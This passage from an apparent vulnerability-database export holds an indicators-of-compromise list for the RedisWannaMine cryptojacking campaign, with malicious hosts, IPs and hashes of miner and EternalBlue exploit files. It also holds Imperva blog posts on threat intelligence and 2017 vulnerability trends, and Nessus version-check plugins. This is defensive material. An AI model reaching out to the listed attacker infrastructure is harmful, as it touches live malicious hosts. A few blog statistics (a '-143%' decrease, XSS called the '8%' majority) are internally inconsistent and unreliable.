IOC\n\n**Hosts:**\n\nhttp://ipfs.io/\n\nhttp://admission.fri3nds.in/\n\n**IPs:**\n\n147.135.130.181\n\n217.182.195.23\n\n**Files:**\n\n615f70c80567aab97827f1a0690987061e105f004fbc6ed8db8ebee0cca59113 transfer.sh\n\n260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79 clay\n\n2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2 minerd\n\neb010a63650f4aa58f58a66c3082bec115b2fec5635fa856838a43add059869d admission.exe\n\nf8428b0ceb5eaf1e496d79824a9c2b6c685fdeb2ddc36b036748ea71b15a5d79 xmr-32.exe\n\ne1c9ffc6677c7c2a6edec5d47bdff5e572d8fdf57675c41ff9e63a8c20bb18db xmr-64.exe\n\ncdadd649c42d28264277dd8edd5b6de23c8070fbf7b5a5ecdcbe03d99613efba ebrun.sh\n\nb2f5abb708c3481ad69aa459e3107c892bceafd26122129c84338cac92bf4797 ebscan.sh\n\n99a4ded26895422707f7c92eca9c9d64212cc033c50010fb027fe32ab55386d9 eternalblue_exploit7.py\n\n34022a65a3eb93b109ed4c6e1233c6404197818a70f51ab654e2c7e474ee2539 eternalblue_exploit8.py\n\n9040274f28d8dbe9e2372fec6482964fa2de8a790c818a3238d0af5fda6c3dbf order.py\n\nc7ed3da4e8d29474909bb0c57e788799fbd3ff96a00e2a0d8f752ed494b9773f rangeip.py\n\ne74e8b14e00de1cdf14d885e3b8a85d33e33e0b239e202243fc4edeeb84a1325 redisrun.sh\n\n794a891cae3374bf28c78eeb3ca39bd59f6ed927f28477561cc0fd11909f34fb redisscan.sh\n\n1bca0088f84d9642002e8d403efb77f75596a9d9c50f171e587a66cc804fa971 runcmd\n\ne3d2088d0cf68efe57babddd7a6973ca5187a127f5e8932436a781391de0320c x64.bin", "modified": "2018-03-08T18:45:38", "published": "2018-03-08T18:45:38", "id": "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "href": "https://www.imperva.com/blog/2018/03/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/", "type": "impervablog", "title": "RedisWannaMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-14T03:35:02", "bulletinFamily": "blog", "description": "[Reputation intelligence](<https://www.imperva.com/app-security/threat-intelligence-101/reputation-intelligence/>) is information about cyber entities known for specific activity, whether malicious or benign, which can be fed to and actioned on by a web application firewall (WAF). It provides an additional application security layer by effectively identifying and blocking threats from known malicious sources. Using reputation intelligence, large amounts of traffic can be classified as malicious or benign, reducing the workload of WAFs to inspect the actual content of that traffic. You can better understand where traffic originates, who is creating it and the potential risk.\n\nWith up to date information on all known cyber entities delivered to your [WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>), reputation intelligence can help block an attack or allow legitimate traffic, which in turn significantly reduces false positives.\n\nExamples of reputation intelligence entities include:\n\n * **Malicious IP Addresses:** Sources that have repeatedly attacked other websites\n * **Anonymous Proxies**: Proxy servers used by attackers to hide their true location\n * **TOR Networks**: Anonymous communication software used by hackers to disguise the source of an attack\n * **IP Geo-location**: Geographic location from which attacks are initiated\n * **Phishing URLs**: Fraudulent sites (URLs) that are used in phishing attacks\n * **Comment Spammers**: IP addresses of known active comment spammers\n * **Remote File Include (RFI):** URLs that were identified as locations from where malicious files are downloaded\n * **SQL Injection IPs:** IP addresses that were identified as serial SQL injection attackers\n * **Scanner IPs:** IP addresses that were identified as serial scanner attackers\n * **Spamdexing:** URLs used in comment spam attacks\n\n## Benefits of Reputation Intelligence\n\nPeople often ask us why they should add reputation intelligence to their WAF. One of our large global customers summed it up best, \u201cReputation intelligence is the low hanging fruit, we just block based on the feeds delivered to the WAF and see immediate value \u2013 I\u2019m blocking the bad guys without creating new security rules.\u201d This is the fundamental benefit delivered by reputation intelligence \u2013 automated blocking of threats based on specific entities, such as IPs or URLs.\n\nThere are additional benefits to adding reputation intelligence to your WAF such as gaining geo-location information to reduce false positives and establish and enforce business policies. For example, many enterprises have geo-location restrictions. Some media entertainment companies such as Netflix provide service to their customers in the US only and they could use a geo-location feature to enforce that policy.\n\nReputation intelligence is also used to minimize false positives generated by a WAF by providing white list resources:\n\n * CDN IP addresses\n * Legitimate search engines\n * Well-known \u201cgood\u201d (non-malicious) entities\n\nA WAF can use this intelligence to exclude certain entities from strict policies. For example, if you want to block scanning attempts based on the resource polling frequency from servers you can do it while allowing legitimate search engine indexing traffic to avoid false positives.\n\nReputation intelligence will enable a WAF to enforce other business-oriented policies. For example, some enterprises want to allow users browsing access to their website from certain countries that use anonymized proxies. On the other hand, attackers frequently use automated tools behind anonymized proxies to attack web applications. A WAF with reputation intelligence can set a granular policy to block automated tools that hide behind anonymous proxies and TOR networks while allowing legitimate human traffic.\n\nApart from delivering feeds on cyber entities, reputation intelligence is also used to mitigate zero-day attacks. After the latest Apache Struts remote code execution vulnerability was released ([CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)) Imperva used its reputation intelligence service to push the mitigation for it in a matter of hours to SecureSphere WAF customers providing them with zero-day protection.\n\n## Measuring the Quality of Reputation Intelligence\n\nVarious vendors offer reputation intelligence services, so how do you know which one is best? Great question, difficult answer. If there are a lot of false positives that\u2019s an obvious indicator that the reputation intelligence service feed is not high quality and you don\u2019t want to use it. But there are several parameters to consider. Here\u2019s what to look for:\n\n * **Size of feed** \u2013 The number of entries in the feed will vary by the content\u2014from a few hundred to a few thousand\u2014but they should represent the real-world landscape of good and bad cyber entities that extend beyond IP addresses to include phishing sites, TOR networks, and proxies. For example, you might expect a feed of dedicated phishing sites to contain a few dozen active sites, malicious SQL injection IPs to contain a few hundred, and IP comment spam as much as 50,000 IPs.\n * **False-positive and true-positive rates** \u2013 This reflects the accuracy of the feed. Lower false-positive rates and higher true-positives rates indicate better feed quality.\n * **Geographic diversity** \u2013 In cases where a company\u2019s business is open to the entire world, you will want reputation feeds that cover all parts of the world and aren't limited to a specific geo-location, such as US traffic only.\n * **Reputation intelligence updates** \u2013 Most malicious entities are constantly changing. IPs on the world wide web are dynamically allocated to users. For example, the majority of phishing sites remain active for [only four to eight hours](<https://www.darkreading.com/threat-intelligence/14-million-new-phishing-sites-launched-each-month/d/d-id/1329955>). Therefore, the frequency in which the feeds are updated is important.\n\nYou need to be sure that a vendor\u2019s coverage of the web is wide enough. Vendors that see many gigabits of traffic per day across different regions around the world will have more visibility to provide more accurate coverage. This will dramatically increase the size of the feed and the true positive rate, reduce the number of false positives and provide higher diversity of resources.\n\n## You Have Reputation Intelligence, Now What?\n\nOnce you have reputation intelligence delivered via automated feed to your WAF you can take the following actions:\n\n * **Block threats** \u2013 With high quality reputation intelligence feeds you will see a low-to-zero false-positive rate and can begin using WAF in blocking mode.\n * **Perform forensics** \u2013 Gather reputation based traffic in your estate and use it to correlate with other security devices for forensics and incident response.\n * **Build** **compound policies** \u2013 Use the reputation intelligence feeds to create more robust security policies. For example, IP comment spam resource feeds can be combined with the behavior characteristics of publishing a comment on a web site (such as POST HTTP method and a parameter with a URL).\n\nIn summary, reputation intelligence improves your application security posture, reduces false positives, increases accuracy and mitigates zero day threats.\n\nLearn more about Imperva [reputation intelligence services](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) or [request a demo](<https://www.imperva.com/Resources/RequestDemo?src=WWW:RequestDemo:US:product-banner:demopage>).", "modified": "2017-11-13T16:30:38", "published": "2017-11-13T16:30:38", "href": "https://www.imperva.com/blog/2017/11/how-reputation-intelligence-improves-application-security/", "id": "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "type": "impervablog", "title": "How Reputation Intelligence Improves Application Security", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-28T17:52:36", "bulletinFamily": "blog", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of huge a DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs suspected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notoriously known for its bad security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7) which is a significant decrease (-143%) from the number of PHP vulnerabilities in 2016 (107) (see Figure 7). At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "modified": "2017-12-28T17:20:47", "published": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "bulletinFamily": "blog", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "modified": "2017-12-18T17:43:16", "published": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-02-01T02:13:25", "bulletinFamily": "scanner", "description": "The version of Apache Struts running on the remote host is 2.3.x prior\nto 2.3.33. It is, therefore, affected by the following vulnerability:\n\n - A flaw exists in unspecified Spring AOP functionality\n that is used to secure Struts actions. An authenticated,\n remote attacker can exploit this to cause a denial of\n service condition. (CVE-2017-9787)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2020-02-02T00:00:00", "id": "STRUTS_2_3_33.NASL", "href": "https://www.tenable.com/plugins/nessus/118731", "published": "2018-11-05T00:00:00", "title": "Apache Struts 2.3.x < 2.3.33 Denial of Service (S2-049)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118731);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2017-9787\");\n script_bugtraq_id(99563);\n\n script_name(english:\"Apache Struts 2.3.x < 2.3.33 Denial of Service (S2-049)\");\n script_summary(english:\"Checks the Struts 2 version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple denial of service vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x prior\nto 2.3.33. It is, therefore, affected by the following vulnerability:\n\n - A flaw exists in unspecified Spring AOP functionality\n that is used to secure Struts actions. An authenticated,\n remote attacker can exploit this to cause a denial of\n service condition. (CVE-2017-9787)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.33\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.33 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9787\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{ \"min_version\" : \"2.3.0\", \"fixed_version\" : \"2.3.33\" }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-01T06:42:12", "bulletinFamily": "scanner", "description": "Security constrained bypass in error page mechanism :\n\nA vulnerability was discovered in the error page mechanism in Tomcat", "modified": "2020-02-02T00:00:00", "id": "ALA_ALAS-2017-854.NASL", "href": "https://www.tenable.com/plugins/nessus/101271", "published": "2017-07-07T00:00:00", "title": "Amazon Linux AMI : tomcat8 (ALAS-2017-854)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-854.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101271);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2017-5664\");\n script_xref(name:\"ALAS\", value:\"2017-854\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2017-854)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security constrained bypass in error page mechanism :\n\nA vulnerability was discovered in the error page mechanism in Tomcat's\nDefaultServlet implementation. A crafted HTTP request could cause\nundesired side effects, possibly including the removal or replacement\nof the custom error page. (CVE-2017-5664)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-854.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat8' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 